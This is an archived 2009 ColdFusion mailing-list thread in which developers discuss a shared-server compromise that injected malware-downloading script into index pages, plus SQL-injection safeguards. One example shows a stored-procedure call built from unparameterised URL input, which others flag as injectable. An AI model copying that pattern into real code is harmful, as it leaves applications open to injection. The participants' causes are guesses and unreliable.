Mark, I can confirm that there has been FTP related 'sploits going around. I received a message from a hosting company warning that: "There is a potential security exploit within the FTP software that we use on your account." Just a 411 G! On Mon, Apr 13, 2009 at 1:13 PM, Mark Kruger wrote: > > Donnie, > > I believe this is the same attack I have been helping another customer with > and it does not appear to be related to CF. Instead, it appears to start > with a malware install of some kind on the server (and possibly a root kit) > and then progress to the creation of accounts and the changing of file > permissions. Another theory gaining weight (and illustrating that we don't > know much yet) is that this attack is an agent on a client computer that > piggybacks onto FTP - which explains a few things but not everything. I'm > guessing some combination at this point. > > Anyway, I agree that cfexecute is a dangerous tag that needs to be > controlled, but it does not appear to be the cuprit. All of this advice is > good, but the only place that CF comes into play on this particular hack > happens to be the propensity to use "index.cfm" as the home page script. > The > attack targets "index.*" files and affects (on the server I am working > with) > Index.cfm, index.html and index.php etc. > > -Mark > > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message- > From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com] > Sent: Monday, April 13, 2009 8:30 AM > To: cf-talk > Subject: Re: Question about hack > > > Hi Nick, > > I know this post is a bit late but to your original question, that attack > is > as a result of incorrect file/iis permissions and is not an XSS attack. I > would even bet that you are on a shared server (at HMS) since one of my > client sites had this exact same problem. The attacker would have gained > access to the file system (possibly via FTP) and executed code that > injected > the code into all index.* files on the server (not just your hosting > account). We have had a lot of problems trying to get this sorted out. It > appears that the issue was with security related to the windows script host > and/or CFEXECUTE. The only thing you can do to prevent this is work with > your hosting provider to secure the system or move to a VPS or dedicated > account and make sure your FTP accounts are secure. > > HTH > > Donnie Bachan > "Nitendo Vinces - By Striving You Shall Conquer" > == > The information transmitted is intended only for the person or entity to > which it is addressed and may contain confidential and/or privileged > material. Any review, retransmission, dissemination or other use of, or > taking of any action in reliance upon, this information by persons or > entities other than the intended recipient is prohibited. If you received > this in error, please contact the sender and delete the material from any > computer. > > > > On Mon, Apr 13, 2009 at 1:30 PM, Richard White wrote: > > > > hi dave, i have scripts that write to the file system as well. what > > would i need to do to secure them, do you have a link that i could > > read in relation to this as i am a little lost as to what to do > > > > thanks > > > >> > We are having to scrub our files to remove the injected code (which > >> is being written directly > >> > to the files as the result of the hack allowing "FULL CONTROL" for > >> the Everyone user on the > >> > machine. > >> > > >> > Have you determined a solution for removing/preventing this? > >> > >> First, audit your code to find any scripts that can write to the > >> filesystem. > >> Second, audit your code to find any scripts that pass unfiltered user > >> input to the database. > >> Third, fix that code. > >> Fourth, configure filesystem permissions properly to prevent CF or > >> your database from writing to the web server's webroot. > >> > >> Dave Watts, CTO, Fig Leaf Software > >> http://www.figleaf.com/ > >> > >> Fig Leaf Software provides the highest caliber vendor-authorized > >> instruction at our training centers in Washington DC, Atlanta, > >> Chicago, Baltimore, Northern Virginia, or on-site at your location. > >> Visit http://training.figleaf.com/ for more > > information! > > > > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321595 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
thanks for the info > > this sounds like a good idea. when a hack is taking place would the > home page not be > > available? is this because they are running multiple scripts which > takes all the resources? > > Many automated attacks deface your existing pages, or append > additional content to those pages. Not all do, of course. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > > Fig Leaf Software provides the highest caliber vendor-authorized > instruction at our training centers in Washington DC, Atlanta, > Chicago, Baltimore, Northern Virginia, or on-site at your location. > Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321580 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> this sounds like a good idea. when a hack is taking place would the home page > not be > available? is this because they are running multiple scripts which takes all > the resources? Many automated attacks deface your existing pages, or append additional content to those pages. Not all do, of course. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321578 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
this sounds like a good idea. when a hack is taking place would the home page not be available? is this because they are running multiple scripts which takes all the resources? can you explain this a little more as i feel like it is a good idea, and would like to understand how to implement it thanks >To test if I have been hacked: I run an automated task from my >home computer that requests my home page every 15 minutes. I use a >URL variable that tells my home page to display a footer (which only >appears when this particular url variable is present) which shows my >name, address, phone, email address and a few other fields taken from >my "members" table. I then compare what is displayed to what I know >belongs there. (The only part that changes is the banner ad, which I >ignore) IF the page isn't available, or if any of the text >changes, I send an alert to my cell phone. When I was hacked last >year, every table in my database had a javascrpt inserted into it. >This will alert me if that happen again. I do this for my 3 most >important web sites. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321577 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Hi Mark, I only mentioned cfexecute because of the permissions set on our specific case. Your info seems most likely. I did notice that there was a cfm file created with a call to cfexecute on the webroot so this should be a check as well. best regards Donnie On 4/13/09, Nick Gleason wrote: > > Donnie, Mark, > > Our research so far seems to support marks's analysis of this problem. > There are still some unknowns here so that may change. But, changing your > FTP accounts and setting your FTP server to ban IPs after a certain number > of failed login attempts will prevent most brute force attempts on FTP. Our > server admin didn't do that which appears to have been a mistake. > > Nick > > > . > > >> -Original Message- >> From: Mark Kruger [mailto:mkru...@cfwebtools.com] >> Sent: Monday, April 13, 2009 1:14 PM >> To: cf-talk >> Subject: RE: Question about hack >> >> >> Donnie, >> >> I believe this is the same attack I have been helping another >> customer with and it does not appear to be related to CF. >> Instead, it appears to start with a malware install of some >> kind on the server (and possibly a root kit) and then >> progress to the creation of accounts and the changing of file >> permissions. Another theory gaining weight (and illustrating >> that we don't know much yet) is that this attack is an agent >> on a client computer that piggybacks onto FTP - which >> explains a few things but not everything. I'm guessing some >> combination at this point. >> >> Anyway, I agree that cfexecute is a dangerous tag that needs >> to be controlled, but it does not appear to be the cuprit. >> All of this advice is good, but the only place that CF comes >> into play on this particular hack happens to be the >> propensity to use "index.cfm" as the home page script. The >> attack targets "index.*" files and affects (on the server I >> am working with) Index.cfm, index.html and index.php etc. >> >> -Mark >> > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321565 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
To test if I have been hacked: I run an automated task from my home computer that requests my home page every 15 minutes. I use a URL variable that tells my home page to display a footer (which only appears when this particular url variable is present) which shows my name, address, phone, email address and a few other fields taken from my "members" table. I then compare what is displayed to what I know belongs there. (The only part that changes is the banner ad, which I ignore) IF the page isn't available, or if any of the text changes, I send an alert to my cell phone. When I was hacked last year, every table in my database had a javascrpt inserted into it. This will alert me if that happen again. I do this for my 3 most important web sites. > > We have been attacked by the exact same hack. We discovered it on > > April 6 and it has proven impossible to clean/remove. > >hi, i am relatively new to CF and building web applications. i have >built a few web apps and tried to use as much security as i can. my >questions is how do you guys discover that you have been hacked? >would a hosting company let you know? does the customer let you know >of changes in behaviour? do you have a piece of software looking for >anything suspicious in the logs, etc... > >thanks ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321555 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Question about hack
Donnie, Mark, Our research so far seems to support marks's analysis of this problem. There are still some unknowns here so that may change. But, changing your FTP accounts and setting your FTP server to ban IPs after a certain number of failed login attempts will prevent most brute force attempts on FTP. Our server admin didn't do that which appears to have been a mistake. Nick . > -Original Message- > From: Mark Kruger [mailto:mkru...@cfwebtools.com] > Sent: Monday, April 13, 2009 1:14 PM > To: cf-talk > Subject: RE: Question about hack > > > Donnie, > > I believe this is the same attack I have been helping another > customer with and it does not appear to be related to CF. > Instead, it appears to start with a malware install of some > kind on the server (and possibly a root kit) and then > progress to the creation of accounts and the changing of file > permissions. Another theory gaining weight (and illustrating > that we don't know much yet) is that this attack is an agent > on a client computer that piggybacks onto FTP - which > explains a few things but not everything. I'm guessing some > combination at this point. > > Anyway, I agree that cfexecute is a dangerous tag that needs > to be controlled, but it does not appear to be the cuprit. > All of this advice is good, but the only place that CF comes > into play on this particular hack happens to be the > propensity to use "index.cfm" as the home page script. The > attack targets "index.*" files and affects (on the server I > am working with) Index.cfm, index.html and index.php etc. > > -Mark > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321557 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Donnie, I believe this is the same attack I have been helping another customer with and it does not appear to be related to CF. Instead, it appears to start with a malware install of some kind on the server (and possibly a root kit) and then progress to the creation of accounts and the changing of file permissions. Another theory gaining weight (and illustrating that we don't know much yet) is that this attack is an agent on a client computer that piggybacks onto FTP - which explains a few things but not everything. I'm guessing some combination at this point. Anyway, I agree that cfexecute is a dangerous tag that needs to be controlled, but it does not appear to be the cuprit. All of this advice is good, but the only place that CF comes into play on this particular hack happens to be the propensity to use "index.cfm" as the home page script. The attack targets "index.*" files and affects (on the server I am working with) Index.cfm, index.html and index.php etc. -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com] Sent: Monday, April 13, 2009 8:30 AM To: cf-talk Subject: Re: Question about hack Hi Nick, I know this post is a bit late but to your original question, that attack is as a result of incorrect file/iis permissions and is not an XSS attack. I would even bet that you are on a shared server (at HMS) since one of my client sites had this exact same problem. The attacker would have gained access to the file system (possibly via FTP) and executed code that injected the code into all index.* files on the server (not just your hosting account). We have had a lot of problems trying to get this sorted out. It appears that the issue was with security related to the windows script host and/or CFEXECUTE. The only thing you can do to prevent this is work with your hosting provider to secure the system or move to a VPS or dedicated account and make sure your FTP accounts are secure. HTH Donnie Bachan "Nitendo Vinces - By Striving You Shall Conquer" == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Mon, Apr 13, 2009 at 1:30 PM, Richard White wrote: > > hi dave, i have scripts that write to the file system as well. what > would i need to do to secure them, do you have a link that i could > read in relation to this as i am a little lost as to what to do > > thanks > >> > We are having to scrub our files to remove the injected code (which >> is being written directly >> > to the files as the result of the hack allowing "FULL CONTROL" for >> the Everyone user on the >> > machine. >> > >> > Have you determined a solution for removing/preventing this? >> >> First, audit your code to find any scripts that can write to the >> filesystem. >> Second, audit your code to find any scripts that pass unfiltered user >> input to the database. >> Third, fix that code. >> Fourth, configure filesystem permissions properly to prevent CF or >> your database from writing to the web server's webroot. >> >> Dave Watts, CTO, Fig Leaf Software >> http://www.figleaf.com/ >> >> Fig Leaf Software provides the highest caliber vendor-authorized >> instruction at our training centers in Washington DC, Atlanta, >> Chicago, Baltimore, Northern Virginia, or on-site at your location. >> Visit http://training.figleaf.com/ for more > information! > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321554 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Checking log files, reviewing websites, automated emails with error messages. Those are just a few examples. -Original Message- From: Richard White [mailto:rich...@j7is.co.uk] Sent: Monday, April 13, 2009 7:16 AM To: cf-talk Subject: Re: Question about hack > We have been attacked by the exact same hack. We discovered it on > April 6 and it has proven impossible to clean/remove. hi, i am relatively new to CF and building web applications. i have built a few web apps and tried to use as much security as i can. my questions is how do you guys discover that you have been hacked? would a hosting company let you know? does the customer let you know of changes in behaviour? do you have a piece of software looking for anything suspicious in the logs, etc... thanks ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321552 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Hi Nick, I know this post is a bit late but to your original question, that attack is as a result of incorrect file/iis permissions and is not an XSS attack. I would even bet that you are on a shared server (at HMS) since one of my client sites had this exact same problem. The attacker would have gained access to the file system (possibly via FTP) and executed code that injected the code into all index.* files on the server (not just your hosting account). We have had a lot of problems trying to get this sorted out. It appears that the issue was with security related to the windows script host and/or CFEXECUTE. The only thing you can do to prevent this is work with your hosting provider to secure the system or move to a VPS or dedicated account and make sure your FTP accounts are secure. HTH Donnie Bachan "Nitendo Vinces - By Striving You Shall Conquer" == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Mon, Apr 13, 2009 at 1:30 PM, Richard White wrote: > > hi dave, i have scripts that write to the file system as well. what would i > need to do to secure them, do you have a link that i could read in relation > to this as i am a little lost as to what to do > > thanks > >> > We are having to scrub our files to remove the injected code (which >> is being written directly >> > to the files as the result of the hack allowing "FULL CONTROL" for >> the Everyone user on the >> > machine. >> > >> > Have you determined a solution for removing/preventing this? >> >> First, audit your code to find any scripts that can write to the >> filesystem. >> Second, audit your code to find any scripts that pass unfiltered user >> input to the database. >> Third, fix that code. >> Fourth, configure filesystem permissions properly to prevent CF or >> your database from writing to the web server's webroot. >> >> Dave Watts, CTO, Fig Leaf Software >> http://www.figleaf.com/ >> >> Fig Leaf Software provides the highest caliber vendor-authorized >> instruction at our training centers in Washington DC, Atlanta, >> Chicago, Baltimore, Northern Virginia, or on-site at your location. >> Visit http://training.figleaf.com/ for more > information! > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321551 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
hi dave, i have scripts that write to the file system as well. what would i need to do to secure them, do you have a link that i could read in relation to this as i am a little lost as to what to do thanks > > We are having to scrub our files to remove the injected code (which > is being written directly > > to the files as the result of the hack allowing "FULL CONTROL" for > the Everyone user on the > > machine. > > > > Have you determined a solution for removing/preventing this? > > First, audit your code to find any scripts that can write to the > filesystem. > Second, audit your code to find any scripts that pass unfiltered user > input to the database. > Third, fix that code. > Fourth, configure filesystem permissions properly to prevent CF or > your database from writing to the web server's webroot. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > > Fig Leaf Software provides the highest caliber vendor-authorized > instruction at our training centers in Washington DC, Atlanta, > Chicago, Baltimore, Northern Virginia, or on-site at your location. > Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321550 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
> We have been attacked by the exact same hack. We discovered it on > April 6 and it has proven impossible to clean/remove. hi, i am relatively new to CF and building web applications. i have built a few web apps and tried to use as much security as i can. my questions is how do you guys discover that you have been hacked? would a hosting company let you know? does the customer let you know of changes in behaviour? do you have a piece of software looking for anything suspicious in the logs, etc... thanks ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321549 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Jason, look for a file named logs.asp or log.asp or one named top.aspx if you see either of those files on your computer look at them and possably delete them. Those where the files that where where the infection was being told what to do. also, will you tell me what Content Management System any of you guys that have the infection use? because I am starting to think the only thing that is relating this to ColdFusion is that CMS that is very unsecure and very old. Also, seens how the info we are experiancing is the same i figured i'd post the IP address of what infected us in the first place: 61.236.71.195 check your log files see if that ip address turns up and see what happened for yourself, the ip address turns out to be something in china i believe. On Fri, Apr 10, 2009 at 2:04 PM, Dave Watts wrote: > > > We are having to scrub our files to remove the injected code (which is > being written directly > > to the files as the result of the hack allowing "FULL CONTROL" for the > Everyone user on the > > machine. > > > > Have you determined a solution for removing/preventing this? > > First, audit your code to find any scripts that can write to the > filesystem. > Second, audit your code to find any scripts that pass unfiltered user > input to the database. > Third, fix that code. > Fourth, configure filesystem permissions properly to prevent CF or > your database from writing to the web server's webroot. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > > Fig Leaf Software provides the highest caliber vendor-authorized > instruction at our training centers in Washington DC, Atlanta, > Chicago, Baltimore, Northern Virginia, or on-site at your location. > Visit http://training.figleaf.com/ for more information! > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321520 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> We are having to scrub our files to remove the injected code (which is being > written directly > to the files as the result of the hack allowing "FULL CONTROL" for the > Everyone user on the > machine. > > Have you determined a solution for removing/preventing this? First, audit your code to find any scripts that can write to the filesystem. Second, audit your code to find any scripts that pass unfiltered user input to the database. Third, fix that code. Fourth, configure filesystem permissions properly to prevent CF or your database from writing to the web server's webroot. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321519 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Nick: We have been attacked by the exact same hack. We discovered it on April 6 and it has proven impossible to clean/remove. I have read through this thread, but I don't see where you found anything specifically causing the problem. We are also using IIS6 and CF7 and have approx 300 sites on this shared webserver. We are having to scrub our files to remove the injected code (which is being written directly to the files as the result of the hack allowing "FULL CONTROL" for the Everyone user on the machine. Have you determined a solution for removing/preventing this? Let me know. JB >Hi there. We've just seen a hack attempt that we haven't seen before and I >wanted to get feedback. > >The symptom is that some script code is inserted at the bottom of certain >pages (e.g. index.cfm). The script (which has been scrubbed) looks like >this: > > >The script downloads malware, which we obviously want to prevent. We're >trying to determine how it's getting in their, whether through an old site >with inadequate code or the OS or something else. Any thoughts? > >This is on a server running IIS 6 / CF7. > >Thanks in advance, > >Nick ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321518 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
OK thanks for the pointers all, I better roll my sleeves up and start editing before I get done... On 10 Apr 2009, at 18:21, "Brad Wood" wrote: Using MS SQL the code below would be safe as long as all your parameters are strings and encased in single quotes since the cfquery tag will automatically escape any single quotes that exist in the #url.uid" variable. If you were to pass in a numeric value to the stored procedure which did not have single ticks around it, you would be vulnerable again even though it is a stored proc call. If it's all the same to you, I would recommend using the cfstoreproc tag to call your procedure. It allows for the cfprocparam tag for your parameters which can optionally validate your inputs' data type as well. (just like cfqueryparam does) ~Brad - Original Message - From: "Matthew Allen" To: "cf-talk" Sent: Friday, April 10, 2009 1:04 PM Subject: Re: Question about hack OK point taken, not safe with MySQL but fine with MSSQL? I just need to know if I should start working on my old MS SQL codes, so far none have suffered with injection attacks it might be by sheer luck or maybe all is well with it as it is on a MS SQL server, right? Not necessarily. With the proper configuration of MySQL (multiple statements allowed, and \ escaping single quotes) your example below could be hacked. Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321516 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
I've always had the impression that if you use stored procedure and so far it's not dynamically built string you're fine, so like my example in previous post, you put your query in MS SQL and use EXEC to call the query on your CF pages, I sometimes Declare the parameter but most times it's like the way I've described before. Should I stop everything I'm doing now and start editing my codes?!! Luckily I'm less than 2 years in CF, I only have about 6 applications to worry about..; Stored Proc: @uid uniqueidentifier AS BEGIN SELECT ID,column1, column2..etc FROM tbltable WHERE UID = @uid END CF Page: DECLARE @Param1 varchar; EXEC usp_getSomeData @param = '#url.uid#' >Matt, > >Why are you not using cfwqueryparam in the cf code below? Do you have a good >reason not to do so? > >-mark > > > >Mark A. Kruger, CFG, MCSE >(402) 408-3733 ext 105 >www.cfwebtools.com >www.coldfusionmuse.com >www.necfug.com > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321515 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
Using MS SQL the code below would be safe as long as all your parameters are strings and encased in single quotes since the cfquery tag will automatically escape any single quotes that exist in the #url.uid" variable. If you were to pass in a numeric value to the stored procedure which did not have single ticks around it, you would be vulnerable again even though it is a stored proc call. If it's all the same to you, I would recommend using the cfstoreproc tag to call your procedure. It allows for the cfprocparam tag for your parameters which can optionally validate your inputs' data type as well. (just like cfqueryparam does) ~Brad - Original Message - From: "Matthew Allen" To: "cf-talk" Sent: Friday, April 10, 2009 1:04 PM Subject: Re: Question about hack > > OK point taken, not safe with MySQL but fine with MSSQL? I just need to > know if I should start working on my old MS SQL codes, so far none have > suffered with injection attacks it might be by sheer luck or maybe all is > well with it as it is on a MS SQL server, right? > >> Not necessarily. With the proper configuration of MySQL (multiple >> statements >> allowed, and \ escaping single quotes) your example below could be >> hacked. >> >>Brad >> ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321514 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Matt, Why are you not using cfwqueryparam in the cf code below? Do you have a good reason not to do so? -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Matthew Allen [mailto:a.matthe...@yahoo.com] Sent: Friday, April 10, 2009 1:05 PM To: cf-talk Subject: Re: Question about hack OK point taken, not safe with MySQL but fine with MSSQL? I just need to know if I should start working on my old MS SQL codes, so far none have suffered with injection attacks it might be by sheer luck or maybe all is well with it as it is on a MS SQL server, right? > Not necessarily. With the proper configuration of MySQL (multiple > statements allowed, and \ escaping single quotes) your example below > could be hacked. > >Brad > > - Original Message - > From: "Matthew Allen" > To: "cf-talk" > Sent: Friday, April 10, 2009 12:25 PM > Subject: Re: Question about hack > > > > > > To be more precise, would the code below prevent an injection > attack? > > Store proc: > > ... > > @uid uniqueidentifier > > AS > > BEGIN > > SELECT ID,column1, column2..etc > > FROM tbltable > > WHERE UID = @uid > > END > > > > CF Code: > > EXEC > > usp_getSomeData @param = '#url.uid#' > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321513 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
OK point taken, not safe with MySQL but fine with MSSQL? I just need to know if I should start working on my old MS SQL codes, so far none have suffered with injection attacks it might be by sheer luck or maybe all is well with it as it is on a MS SQL server, right? > Not necessarily. With the proper configuration of MySQL (multiple > statements > allowed, and \ escaping single quotes) your example below could be > hacked. > >Brad > > - Original Message - > From: "Matthew Allen" > To: "cf-talk" > Sent: Friday, April 10, 2009 12:25 PM > Subject: Re: Question about hack > > > > > > To be more precise, would the code below prevent an injection > attack? > > Store proc: > > ... > > @uid uniqueidentifier > > AS > > BEGIN > > SELECT ID,column1, column2..etc > > FROM tbltable > > WHERE UID = @uid > > END > > > > CF Code: > > > > EXEC usp_getSomeData > > @param = '#url.uid#' > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321512 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
Not necessarily. With the proper configuration of MySQL (multiple statements allowed, and \ escaping single quotes) your example below could be hacked. http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL The underlying reason is because you are not explicitly telling your SQL server what is SQL code and what is the parameter. The one and only sure-fire way to do that is with the likes of cfqueryparam, cfprocparam, or sp_executesql (MS SQL Server). ~Brad - Original Message - From: "Matthew Allen" To: "cf-talk" Sent: Friday, April 10, 2009 12:25 PM Subject: Re: Question about hack > > To be more precise, would the code below prevent an injection attack? > Store proc: > ... > @uid uniqueidentifier > AS > BEGIN > SELECT ID,column1, column2..etc > FROM tbltable > WHERE UID = @uid > END > > CF Code: > > EXEC usp_getSomeData > @param = '#url.uid#' > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321509 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Question about hack
One thing I will add is if you are using CFFile to do the upload use it's "accept" attribute to only except the mime types you want to upload. If it errors capture it and output a nice error message. It is not full proof, but another layer in making file upload more safe. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321508 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
